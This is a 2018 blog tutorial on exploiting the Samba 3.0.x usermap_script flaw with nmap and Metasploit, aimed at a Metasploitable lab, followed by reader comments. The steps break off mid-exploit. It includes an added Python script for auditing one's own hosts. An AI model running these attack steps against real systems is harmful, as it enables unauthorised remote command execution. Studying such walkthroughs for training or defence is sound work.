Hacking and gaining access to Linux by exploiting SAMBA service

February 4, 2018 by V.P. Prabhakaran

Step 1

First, we need to find out the ports and services running on the target system. To find the open ports and services, the command is:

Command: nmap -sS -Pn -A

Step 2

Once you have found the open ports and services, such as the Samba port and service, the next step is to send an exploit through that port to create a Meterpreter session. To perform this attack, open Metasploit.

Step 3

Once Metasploit is open, first find the version of Samba.

Command: msf> search scanner/samba

(This command is used to find the scanner for identifying the Samba version)

Step 4

Once you have found the scanner for identifying the target's Samba version, select it.

Command: msf> use auxiliary/scanner/smb/smb_version

(This command selects the scanner module)

Command 2: msf auxiliary(smb_version) > set RHOSTS

(This command is used to set the IP address of the remote host whose version you need to find)

Command 3: exploit

Step 5

After finding the Samba version, perform the attack and gain access to the Linux system with the help of the Meterpreter session.

Command: msf> use exploit/multi/samba/usermap_script

This is the exploit that we need to select to gain access to the system.

Command: msf exploit(usermap_script) > set RHOST
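The module selected in Step 5 depends on two conditions that the module description quoted in the comments on this page spells out: a Samba version from 3.0.20 through 3.0.25rc3 and the non-default "username map script" option. The Python check below, meant for auditing your own hosts, is an added example and not code from the original post or from Metasploit; the result labels, the tuple encoding of versions and the sample configuration are assumptions made for illustration.

```python
import re

FINAL = 10**6                  # a final release sorts after its release candidates
LOW = (3, 0, 20, 0)            # 3.0.20, rc builds included (conservative assumption)
HIGH = (3, 0, 25, 3)           # 3.0.25rc3, upper bound quoted on this page
OPTION = "usernamemapscript"   # smb.conf ignores case and spaces in parameter names

# Constructed sample configuration, not taken from a real host.
SAMPLE_CONF = """\
[global]
   workgroup = LAB
   # username map script = /bin/true
   UserName Map Script = /etc/samba/scripts/mapusers.sh
[share]
   path = /srv/share
"""

def parse_version(text):
    """'Samba 3.0.25rc3' -> (3, 0, 25, 3); returns None if no version is found."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", text)
    if not m:
        return None
    rc = int(m.group(4)) if m.group(4) else FINAL
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), rc)

def username_map_script(conf_text):
    """Return the active 'username map script' value, or None when unset."""
    value = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;[":
            continue                        # blank line, comment or section header
        name, sep, val = line.partition("=")
        if sep and re.sub(r"\s+", "", name).lower() == OPTION:
            value = val.strip() or None     # a later assignment overrides an earlier one
    return value

def assess(version_banner, conf_text):
    """Classify a host from its version banner and smb.conf text."""
    ver = parse_version(version_banner)
    in_range = ver is not None and LOW <= ver <= HIGH
    script = username_map_script(conf_text)
    if in_range and script:
        return "EXPOSED"    # both conditions met: remove the option and upgrade
    if script:
        return "REVIEW"     # option set, version outside the quoted range
    return "PATCH" if in_range else "OK"

if __name__ == "__main__":
    for banner in ("Samba 3.0.20-Debian", "Samba 3.0.25", "Samba 2.2.3a"):
        print(banner, "->", assess(banner, SAMPLE_CONF))
```

The configuration text can come from `testparm -s`, which prints the effective settings, and the banner from `smbd -V` on the host itself.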



V.P. Prabhakaran is a highly experienced security pro, having more than 7 years' experience as Senior Information Security Consultant at Koenig Solutions. Mr. Prabhakaran trains and provides consultancy to professionals for Computer Hacking, Forensic Security and Firewalls. He is certified in CEH, ECSA, ECSS, CHFI, EDRP, ECIH, CEI, OSSTMM (OPST and OPSA) ISECOM Trainer MCT and CEI.

15 responses to “Hacking and gaining access to Linux by exploiting SAMBA service”

  1. Pousen says:

    I’d say a bit weak.
    You don’t explain which systems would be vulnerable, under which vulnerability or whether it is going to work or not.

  2. Youri says:

    Such a pussy explanation. The title should be “A beginner on how to exploit SAMBA using Backtrack”. 7 years experience should give more details. From scratch to PoC. Instead of using other people’s exploit, you should write your own. I guess you don’t have such a knowledge!

  3. I target the Metasploitable lab, which is used for your penetration testing skills. It is only for education purposes.

  4. I am a very practical guy and I just shared the practical in which I exploited the vulnerability of Samba 3.0.
    This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication.

  5. @youri it’s not about exp, it’s all about the information that I am trying to exchange. Don’t be rude, be chill bro.

  6. Prosun says:

    @youri people like you are absolute crap and jealous of others. Can never appreciate anyone’s efforts. Criticism has to be done, but there must be some way. What can we expect from big F*** like Youri???
    @v.p.prabhakaran keep up the good work. Nice concise explanation.

  7. @prosun thanks mate, they don’t respect the information who delivers

  8. Ryan adams says:

    Command tips are so effective and will really help us operate these strategies… so thanks to the blogger for sharing it. http://www.sintre.com/index.php/about-us

  9. Jose Marquez says:

    It was a good read and I appreciate the information exchange!!! Keep it up, you do have a fan or two

  10. Vladmir says:

    It’s easy to talk bad things about others and forget your own ass…
    Prabahakaran Nair shared very important knowledge about a vulnerability in Samba and you guys return with offensive words; there’s not even respect for others. I would say thanks for sharing this with us and don’t worry about those “PACOVIOS”

  11. saati says:

    I followed each and every step mentioned above in a virtual environment but I’m unable to exploit.
    At the last step it is showing a message like
    Exploit completed but no session created.

    Please help me in this.

  12. prabh says:

    @sati are you using the Metasploitable lab?

  13. Mel says:

    Hi, my Samba version is 2.2.3a and I ran it exactly as mentioned above. It says started reverse double handler and then just stops. Can you tell what the problem is?


  14. charit says:

    Hi Sir, how can we do it without Metasploit, like by running an exploit manually?
